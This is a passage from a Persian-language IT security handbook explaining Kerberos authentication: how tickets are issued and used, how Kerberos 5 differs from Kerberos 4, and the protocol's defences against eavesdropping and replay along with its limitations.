‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻪ ﺷﻜﺴﺖ ﺑﻴﺎﻧﺠﺎﻣﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺘﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﺯ ﺷـﻤﺎ‬
‫ﻣﻲﺧﻮﺍﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺗﻼﺵ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ‪ ،Kerberos 5‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﺒﻞ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻳـﻚ ﭘﻴـﺎﻡ‬
‫ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ‪ -‬ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷـﺪﻩ ‪ -‬ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ‪Kerberos‬‬
‫ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﻧﺒﺎﻝ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﻣﻲﮔﺮﺩﺩ‪ ،‬ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻣﻲﻳﺎﺑﺪ‪ ،‬ﻭ ﺗﻼﺵ ﻣﻲﻛﻨـﺪ ﺗـﺎﺭﻳﺦ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺗﺎﺭﻳﺦ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ )ﻛﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻥ ﺗﺎﺭﻳﺦ‪ ،‬ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ( ﺁﻧﮕـﺎﻩ‬
‫‪١٧٦‬‬
‫ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺁﻧﺮﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﻳﻚ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺍﺳﺖ ﺣﺎﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺑﻠﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ ‪ - Kerberos‬ﻛـﻪ‬
‫ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ‬
‫ﺑﻠﻴﻂ ‪ Kerberos‬ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﻣﻮﻛﻞ ﺩﺭﻭﻥ ﻗﻠﻤﺮﻭﻱ ‪ - Kerberos‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎ ﻭ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ ‪ -‬ﺑﻠﻴﻂ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ‪ Kerberos‬ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ‪،‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺗﻤﺎﺱ ﻣﻲﮔﻴـﺮﺩ ﻭ ﺗﻘﺎﺿـﺎﻱ ﻳـﻚ ﺑﻠـﻴﻂ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ‬
‫ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻪ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ‪ .‬ﺑﻠﻴﻂ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﻠـﻴﻂ‬
‫ﺩﻳﮕﺮ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﺑﻠﻴﻂ ﻳﺎﺩﺷﺪﻩ ﺣﺎﻭﻱ ﻧﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﻛﺎﺭﺑﺮ‪ ،‬ﺯﻣﺎﻥ ﺍﻧﻘﻀﺎ ﻭ ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮ‬
‫ﺍﺳﺖ‪ .‬ﺳﭙﺲ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﺍﻳﻦ ﺑﻠﻴﻂ ﺭﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺑﻠﻴﻂ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺧﻮﺩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ )‪ ،UID‬ﺁﺩﺭﺱ ‪ (IP‬ﻭ ﻳﻚ ‪ UID‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﺎﻳـﻞ‬
‫ﻣﻲﺳﺎﺯﺩ‪ Kerberos .‬ﺯﻣﺎﻥ ﺭﻭﺯ ﺭﺍ ﺩﺭ ﺗﻘﺎﺿﺎﻫﺎ ﻣﻲﮔﺬﺍﺭﺩ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﻳﻚ ﺗﻘﺎﺿﺎ ﻭ ﺍﻧﺘﻘﺎﻝ ﺁﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻣﺸﺎﺑﻪ ﺩﺭ ﺯﻣﺎﻧﻬـﺎﻱ ﺑﻌـﺪ‬
‫)ﻣﺜ ﹰﻼ ﺩﺭ ﻳﻚ ﺣﻤﻠﻪ ﺗﻜﺮﺍﺭ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ( ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪.‬‬

‫‪ ۱۷۵‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻘﺎﻻﺕ ﻭ ﺍﺳﻨﺎﺩ ‪ ،kerberos‬ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘﻲ ﺩﻭ ﻧﻮﻉ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ kerberos‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻭ ﺳﺮﻭﻳﺲ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ‪.‬‬
‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻠﻘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺖ‪ ،‬ﭼﻮﻥ ﻫﻤﻪ ﺳﻴﺴﺘﻢ ‪ kerberos‬ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺗﻨﻬـﺎ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ‪ -‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫‪ ،kerberos‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ‪ -‬ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫‪ ۱۷۶‬ﭼﺮﺍ ﭘﺮﻭﺗﻜﻞ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ؟ ‪ Kerberos 4‬ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺗﻲ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫ﺑﺎﻋﺚ ﺷﺪ ﺑﺮﺍﺣﺘﻲ ﺑﺘﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ‪ Kerberso 4‬ﺭﺍ ﺑﺼﻮﺭﺕ ‪ offline‬ﺣﺪﺱ ﺯﺩ‪ .‬ﺩﺭ ‪ Kerberos 5‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ kerberos‬ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻦﺗﺮ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪ ﭼﻮﻥ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺎﺭﺑﺮ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻟﺬﺍ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ﻭ ﺑﺎ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻛﺎﻣﻞ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﮔﺮﺩﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤٠‬‬

‫‪ Kerberos‬ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪ ﻣﺰﻳﺖ ﺩﺍﺭﺩ‪ .‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺠﺎﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻥ ﺩﺭ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻨﻔـﺮﺩ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ Kerberos‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﺮﮔﺰ ﺍﺯ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻧﺘﻘﺎﻝ ﻧﻤﻲﻳﺎﺑﻨﺪ ‪ -‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﺷﺪﻩ ﻳﺎ ﻫﺮ ﻃـﻮﺭ ﺩﻳﮕـﺮ‪ .‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ‪ Kerberos‬ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ ،‬ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﺎﺭﺑﺮ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳـﺖ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﭼﻮﻥ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ .‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﺷـﺪﻩ‬
‫ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﻣﻘﺼﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮ ‪ Kerberos‬ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺑﻠﻴﻂ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﻣـﻲﺩﺯﺩﺩ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﭼـﻮﻥ ﺑـﺎ ﻛﻠﻴـﺪﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ )ﻛﻠﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲ ‪ Kerberos‬ﻭ ﻳﺎ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ( ﻛﻪ ﻣﻬﺎﺟﻢ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﺪ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩ‪ ،‬ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ‬


‫ﻲ ﻣـﻮﻛﻼﻥ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺣﺎﻟـﺖ ﻋـﺎﺩﻱ ﺍﺯ‬ ‫‪ Kerberos‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﺧـﺼﻮﺻ ﹺ‬
‫‪ Kerberos‬ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺒﺎﺩﻝ ﻛﻠﻴﺪﻫﺎ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻳﮑﭙـﺎﺭﭼﮕﻲ ﻭ‬
‫ﺻﺤﺖ ﺩﺍﺩﻩ ﻭ ﺳﺮﻱ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﺁﻥ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺍﮔﺮ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺘﻘﺎﻟﻲ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭ ﺳﺮﻭﻳﺲ ﺭﺍ ﺑﺎ ﻳﻚ ﻛﻠﻴـﺪ ﻛـﻪ ﻣﻴـﺎﻥ ﺩﻭ‬
‫ﻣﻮﻛﻞ ﻣﺒﺎﺩﻟﻪ ﺷﺪﻩ ﺍﺳﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﺮﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻋﺚ ﻛـﺎﻫﺶ ﻛـﺎﺭﺍﻳﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ‪ MIT‬ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺑﻴﺸﺘﺮ ﺩﺍﺩﻩﻫﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻪ‪.‬‬
‫ﺑﻠﻴﻂﻫﺎﻱ ﺻﺎﺩﺭﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ‪ Kerberos‬ﺑﻌﺪ ﺍﺯ ‪ ۸‬ﺳﺎﻋﺖ ﻣﻨﻘﻀﻲ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﺍﻳﻦ ﺗﻜﻨﻴﻚ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﺗﻜـﺮﺍﺭ ﺩﺭﻧﻈـﺮ‬
‫ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ ١٧٧.‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻌﺪ ﺍﺯ ‪ ۸‬ﺳﺎﻋﺖ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺑﺮﻧﺎﻣﺔ ‪ kinit‬ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻭ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻳﻜﺒـﺎﺭ ﺩﻳﮕـﺮ‬
‫ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ‪ Kerberos‬ﺑﺮﺍﻳﺘﺎﻥ ﻳﻚ ﺑﻠﻴﻂ ﺟﺪﻳﺪ ﺻﺎﺩﺭ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺗﻚ ﻛﺎﺭﺑﺮﻱ‪ Kerberos ،‬ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭ ﻛﻨﺎﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻌﻤﻮﻟﻲ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﮔﺮ ﺩﻭ ﻧﻔﺮ‬
‫ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭﺍﺭﺩ ﺷﻮﻧﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻫﺮ ﺩﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﭘـﺲ ﺍﻳـﻦ ﺩﻭ ﻛـﺎﺭﺑﺮ‬
‫ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺟﺎ ﺑﺰﻧﻨﺪ‪ .‬ﺍﻳﻦ ﺗﻬﺪﻳﺪ ﺩﺭ ‪ MIT‬ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﻮﺩ‪ ،‬ﻟـﺬﺍ ﺧـﺪﻣﺎﺕ ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬
‫ﻛﺎﺭﻱ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺗﺎ ﻫﻨﮕﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺍﺯ ﻭﺭﻭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‬
‫ﻛﻪ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﻠﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻫﻨﮕﺎﻡ ﺗﺎﻳﭗ ﺷﺪﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬

‫ﺗﻬﻴﺔ ‪Kerberos‬‬

